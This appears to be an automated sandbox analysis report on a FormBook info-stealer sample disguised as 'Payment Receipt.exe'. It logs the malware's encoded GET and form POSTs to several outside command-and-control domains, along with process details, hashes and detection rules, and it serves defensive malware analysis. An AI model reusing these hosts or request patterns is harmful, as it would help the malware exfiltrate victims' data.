                                                                    40 | 192.168.2.4 | 50042 | 199.59.243.228 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:17.517158985 CET | 475 | OUT | GET /dx3i/?1V=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.denture-prices.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:42:18.009480000 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:17 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1470
                                                                    x-request-id: 80900f2a-3160-4ed3-905e-837fbc1473be
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ChQqeyFnzfTv8388DewJYhdxCWt8K4UcJrYglAk5daCyjsWBQGaV/uAFSuwDkv0hqSStpTQWxHSB6aH3W1fHaQ==
                                                                    set-cookie: parking_session=80900f2a-3160-4ed3-905e-837fbc1473be; expires=Fri, 03 Jan 2025 10:57:17 GMT; path=/
                                                                    connection: close
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ChQqeyFnzfTv8388DewJYhdxCWt8K4UcJrYglAk5daCyjsWBQGaV/uAFSuwDkv0hqSStpTQWxHSB6aH3W1fHaQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:18.009495974 CET | 224 | IN
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODA5MDBmMmEtMzE2MC00ZWQzLTkwNWUtODM3ZmJjMTQ3M2JlIiwicGFnZV9
                                                                    Jan 3, 2025 11:42:18.009505987 CET | 699 | IN
                                                                    Data Ascii: 0aW1lIjoxNzM1OTAwOTM3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVudHVyZS1wcmljZXMuY2xpY2svZHgzaS8/MVY9ZDhLeTZobWVQS2hVMlh4RlM4b1ZicS9mQnRSOC9TWHcyVTR1WkZVMlBnbEpSL0VzVGg0RkNWcHZsMUI2VTBCSGZJNjhhLzY3bmtPcGxtRFBqZDhwZEVuTXNIazdzV2lOZExQdmE1OWJsNWhoQVA0VF


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    41 | 192.168.2.4 | 50043 | 13.228.81.39 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:23.084750891 CET | 752 | OUT | POST /01c7/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.sonixingenuine.shop
                                                                    Origin: http://www.sonixingenuine.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.sonixingenuine.shop/01c7/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=VRKAxCXV7CRWJxsBZnOXTvYRbXuT2GkTSehJip32wYooXN86iKPftsrwVBgiERwA+KLDdH/B/1SuHEdj7d5HeFI/uwd/r1iZWpvsxwCrw4TDel75WE8sG1xnV1W0giuG9tvSg9zg/TSAWU58MV7vpqYl0X+oe3PWNN3W3+z9Budcsrery2vvLVsoOq73b1doFg==
                                                                    Jan 3, 2025 11:42:24.032463074 CET | 370 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    42 | 192.168.2.4 | 50044 | 13.228.81.39 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:25.678752899 CET | 772 | OUT | POST /01c7/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.sonixingenuine.shop
                                                                    Origin: http://www.sonixingenuine.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.sonixingenuine.shop/01c7/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtYoXvk6jOTfssrwNRhoARwe+KG8dCHB/x6uHARj6uhGR1I9lQd9v1iZWpvsx0rOw8/DeVL5HQovMVxoS1W03yuC9tv0g/Xa/QmAWWx8MnDgnqZu63/cYHqoNoWE5/jpeMR6ptTxjHO4ZVIbTtyDW2gheoUwk0d6ehGeFXcEspovPVM=
                                                                    Jan 3, 2025 11:42:26.620829105 CET | 370 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    43 | 192.168.2.4 | 50045 | 13.228.81.39 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:28.224823952 CET | 10854 | OUT | POST /01c7/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.sonixingenuine.shop
                                                                    Origin: http://www.sonixingenuine.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.sonixingenuine.shop/01c7/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:42:29.147861004 CET | 370 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    44 | 192.168.2.4 | 50046 | 13.228.81.39 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:30.764127970 CET | 474 | OUT | GET /01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.sonixingenuine.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:42:31.691340923 CET | 507 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz6
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    45 | 192.168.2.4 | 50047 | 154.39.239.237 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:37.250813007 CET | 725 | OUT | POST /b9e2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.moyu19.pro
                                                                    Origin: http://www.moyu19.pro
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.moyu19.pro/b9e2/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    46 | 192.168.2.4 | 50048 | 154.39.239.237 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:39.854240894 CET | 745 | OUT | POST /b9e2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.moyu19.pro
                                                                    Origin: http://www.moyu19.pro
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.moyu19.pro/b9e2/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    47 | 192.168.2.4 | 50049 | 154.39.239.237 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:42.433321953 CET | 10827 | OUT | POST /b9e2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.moyu19.pro
                                                                    Origin: http://www.moyu19.pro
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.moyu19.pro/b9e2/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    48 | 192.168.2.4 | 50050 | 154.39.239.237 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:44.984601021 CET | 465 | OUT | GET /b9e2/?1V=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.moyu19.pro
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1



                                                                    Target ID:0
                                                                    Start time:05:38:52
                                                                    Start date:03/01/2025
                                                                    Path:C:\Users\user\Desktop\Payment Receipt.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Payment Receipt.exe"
                                                                    Imagebase:0x730000
                                                                    File size:289'280 bytes
                                                                    MD5 hash:E6BD9E9D02F848789769EDCF7023E15C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:05:39:22
                                                                    Start date:03/01/2025
                                                                    Path:C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe"
                                                                    Imagebase:0x3c0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:05:39:23
                                                                    Start date:03/01/2025
                                                                    Path:C:\Windows\SysWOW64\fc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                                    Imagebase:0x960000
                                                                    File size:22'528 bytes
                                                                    MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:05:39:36
                                                                    Start date:03/01/2025
                                                                    Path:C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe"
                                                                    Imagebase:0x3c0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:05:39:48
                                                                    Start date:03/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff6bf500000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                                      Signature Coverage:15.6%
                                                                      Total number of Nodes:135
                                                                      Total number of Limit Nodes:9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$"
                                                                      • API String ID: 0-3758156766
                                                                      • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                      • Instruction ID: 8fb57fc146de677679978b383bd173cb6978cd77af40a3578885d5b7776ef693
                                                                      • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                      • Instruction Fuzzy Hash: 8DF173B1D0021AEFDB64DB64CC85BEEB7B9EF44300F1481A9E909A7241DB749E45CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfff$qi
                                                                      • API String ID: 0-3408824469
                                                                      • Opcode ID: dcc0bf84a9ad56e6a8ded503bd64d953e62c35cd92d8c3081e2c5e698a1b5e61
                                                                      • Instruction ID: fe7b2c70e491682227880093397f1b090013a6556ac14333a754cfb9d16ac526
                                                                      • Opcode Fuzzy Hash: dcc0bf84a9ad56e6a8ded503bd64d953e62c35cd92d8c3081e2c5e698a1b5e61
                                                                      • Instruction Fuzzy Hash: A0B102727443164FE71ACA2CCC926E8BB56EB56324F5C52BEC852CF2D3F215891287C0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 279 747ca3-747ccc call 75f7e3 282 747cd2-747ce0 call 75fde3 279->282 283 747cce-747cd1 279->283 286 747cf0-747d01 call 75e283 282->286 287 747ce2-747ced call 760083 282->287 292 747d03-747d17 LdrLoadDll 286->292 293 747d1a-747d1d 286->293 287->286 292->293
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00747D15
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                      • Instruction ID: b47a9e12cacc3a73ee7c9b04847446167488831fbd2a52af7d8946e8ef29841f
                                                                      • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                      • Instruction Fuzzy Hash: 7D015EB1E4020DABDF14DBA0CC96FDEB778AB54304F0041A5EE0897240F674EB18CBA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 299 75cb43-75cb7f call 734903 call 75dd73 NtClose
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0075CB7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                      • Instruction ID: 8206bf336f7c7effdd23d73d6f88341eceae3c3021d7da0bf0a6d0d6c5cd360b
                                                                      • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                      • Instruction Fuzzy Hash: 01E04672200244BBE220EA59DC06F9BB76CEFC5710F008555FA58A7242C6B0B91587E1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 313 15e2b60-15e2b6c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d1bb6a1c62360998ff2eedc19a6f85f9b9c9e4172c0911ef26eb7fbe8610ff72
                                                                      • Instruction ID: d569c51058d2ecf3e29643ff625d57e2e3441e78020c9d2aae99f8ab471d03e0
                                                                      • Opcode Fuzzy Hash: d1bb6a1c62360998ff2eedc19a6f85f9b9c9e4172c0911ef26eb7fbe8610ff72
                                                                      • Instruction Fuzzy Hash: 2C90026120240003450571584414616404AE7E1211B59C425E2414990DC665C9A56225
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: efb4a6bc95a297836f6fdb6fabc0d37667fee6a7593bdab116ce7f6aa1d14ae7
                                                                      • Instruction ID: ece4a825972cd39c39a6e94d1a7c764132b1db88d7506ed9f10b1d064ea22799
                                                                      • Opcode Fuzzy Hash: efb4a6bc95a297836f6fdb6fabc0d37667fee6a7593bdab116ce7f6aa1d14ae7
                                                                      • Instruction Fuzzy Hash: 2A90023120140413D511715845047070049E7D1251F99C816A1824958DD796CA66A221

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 314 15e2c70-15e2c7c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 2065394cf928cf7415f4b01ea8a3877ef8c8d20b93835d61c8f0268b9b81fd9d
                                                                      • Instruction ID: 4148e3c0adba99ffc56f1c333c8b480ed35d19aec21455f542ce30763c25dd75
                                                                      • Opcode Fuzzy Hash: 2065394cf928cf7415f4b01ea8a3877ef8c8d20b93835d61c8f0268b9b81fd9d
                                                                      • Instruction Fuzzy Hash: 6990023120148802D5107158840474A0045E7D1311F5DC815A5824A58DC7D5C9A57221
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fb79abdbd9e8c61ea391d7ecb107ccf0383d324d4f6be24883cb545f6f4bcb5e
                                                                      • Instruction ID: e97fababe3f5696cfe48f370160cb99c6d255d5d0369453bd3315ef42bbd5ce5
                                                                      • Opcode Fuzzy Hash: fb79abdbd9e8c61ea391d7ecb107ccf0383d324d4f6be24883cb545f6f4bcb5e
                                                                      • Instruction Fuzzy Hash: BE90023160550402D500715845147061045E7D1211F69C815A1824968DC7D5CA6566A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
